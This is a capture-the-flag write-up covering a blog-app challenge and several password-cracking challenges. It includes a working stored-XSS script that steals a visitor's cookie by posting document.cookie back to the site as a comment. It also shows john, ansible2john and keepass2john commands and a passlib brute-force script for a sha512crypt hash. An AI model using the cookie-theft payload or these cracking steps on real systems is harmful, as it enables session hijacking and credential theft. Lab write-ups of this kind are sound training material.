We've built a new blog app!
Can you get the flag from the admin user? He's logged on right now
I don't have access to the instance anymore since the CTF has been paused, but i will try to explain the steps.
After looking around we see a comment box that supports markdown, which we can exploit. We need to get the admins cookie to get the admins session. I made the following script:
<script>
fetch('http://blog.com:5000/new-comment', {
method: 'POST',
headers:{
'Cookie': document.cookie,
'Content-Type': 'application/x-www-form-urlencoded'
},
body: new URLSearchParams({
'name': 'cookie grab',
'comment': document.cookie
})
})
</script>
You need to make a comment that has this script in it, the script will automatically load whenever someone loads the page with the comments. The script will make a post request simulating that the person has made a comment and then make the comment text have their cookie, there will be a lot of cookies, so you might have to try some different ones, for me the second comment cookie worked, and when pressing the admin
button on the top left side of the page, you are greeted with the flag.
The flag is the password for this vault.
John the ripper has a tool for making john compatible hashes from ansible vault files, but it isn't a standard command, you will need to run the python file directly. Use the command below depending on where your john source files are placed:
python /usr/share/john/ansible2john.py supersecrets.yml > ansiblehash.txt
If you somehow can't find the john files, you can download the ansible2john.py
file from here
This will make a john compatible password hash from the ansible vault file and output it into ansiblehash.txt
.
Now we can run john to bruteforce the password:
john --wordlist=new_rockyou.txt ansiblehash.txt
The new_rockyou.txt
wordlist is from the Password Cracking 2 writeup, check it out.
When john is done, you should have gotten the password zebracrossing
.
The flag is the password for this vault.
For this challenge we will be using John the ripper to crack the password hash. First we need to obtain the password hash. We need to use keepass2john
to make a john compatible hash. We use the command below.
keepass2john keepass.kdbx > keepasshash.txt
This command takes the password hash and then outputs it into the keepasshash.txt
file.
Now we can bruteforce the password with john using the command below:
john --wordlist=/usr/share/wordlists/rockyou.txt KeepassHash.txt
Replace the wordlist path if yours is placed somewhere else.
Now this is going to take a lot of time. But finally when we crack one password challenge, we can crack others faster.
When john has found the password, we can see that it's zebracakes
, and that's the flag.
Now keep in mind that the password included "zebra", this is also the logo of Punk Security. This might mean that we can make a new password list with only entries in rouckyou.txt that includes "zebra". To make this list, i made a quick python script:
with open("rockyou.txt", "r", errors="ignore") as f:
passwords = [pw.strip() for pw in f.readlines()]
new_passwords = []
for password in passwords:
if "zebra" in password.lower():
new_passwords.append(password)
with open("new_rockyou.txt", "w") as f:
f.write("\n".join(new_passwords))
This will make a new_rockyou.txt
file with only entries that includes "zebra" from the original rockyou.txt
list.
You can also download it here if you want to.
$6$XM4TZ5vb6W/0SjIl$PsddDrA8bOKbVXApHrz9NKaF9BH92Fs1aKn6MFHelf1he8z7rbR9Af12FqynqlU2lHILU/FgNaDVUFCK2yc4B0
The flag is the password corresponding with this hash.
For this challenge i first needed to find out what type of hash that was, so i used hashes.com/en/tools/hash_identifier to identify the hash type. It came back as sha512crypt $6$
so I googled that. I found this page that explained it quite well. We can split the hash into 3 parts, the hash method, salt and hash. I made a python script to crack the password for this one using pythons passlib.hash library. I have split the hash into the salt and hash, because the hash type is not really needed when we know that we need to use sha512. Also, i didn't know the amount of rounds the hash went through, so just to be sure, i made it go from 1.000 to 10.000 rounds.
Read Password Cracking 2 to see what new_rockyou.txt
is.
import passlib.hash
salt = "XM4TZ5vb6W/0SjIl"
hashed_flag = "PsddDrA8bOKbVXApHrz9NKaF9BH92Fs1aKn6MFHelf1he8z7rbR9Af12FqynqlU2lHILU/FgNaDVUFCK2yc4B0"
full_hash = "$6$XM4TZ5vb6W/0SjIl$PsddDrA8bOKbVXApHrz9NKaF9BH92Fs1aKn6MFHelf1he8z7rbR9Af12FqynqlU2lHILU/FgNaDVUFCK2yc4B0"
with open("new_rockyou.txt", "r", errors="ignore") as f:
passwords = [pw.strip() for pw in f.readlines()]
for n in range(1,10):
n = n * 1000
print("Rounds:", n)
for password in passwords:
h = passlib.hash.sha512_crypt.hash(password, salt=salt,rounds=n)
if h == full_hash:
print(password)
exit(0)
When running the script, it tries to go through our wordlist and hashes with the salt. If the new hash matches the full hash, then it prints the flag and exits the script.
From the run we see that the amount of rounds is 5.000 and the password is zebrasrule
.
fd217a229b674ae4bcb82a0bb4751e11
The flag is the password corresponding with this hash.
This one was pretty easy. I usually run hashes through hashes.com/en/tools/hash_identifier to identify hashes. And right away it sees that it's an MD5 hash and shows the password. 16drunkzebras
.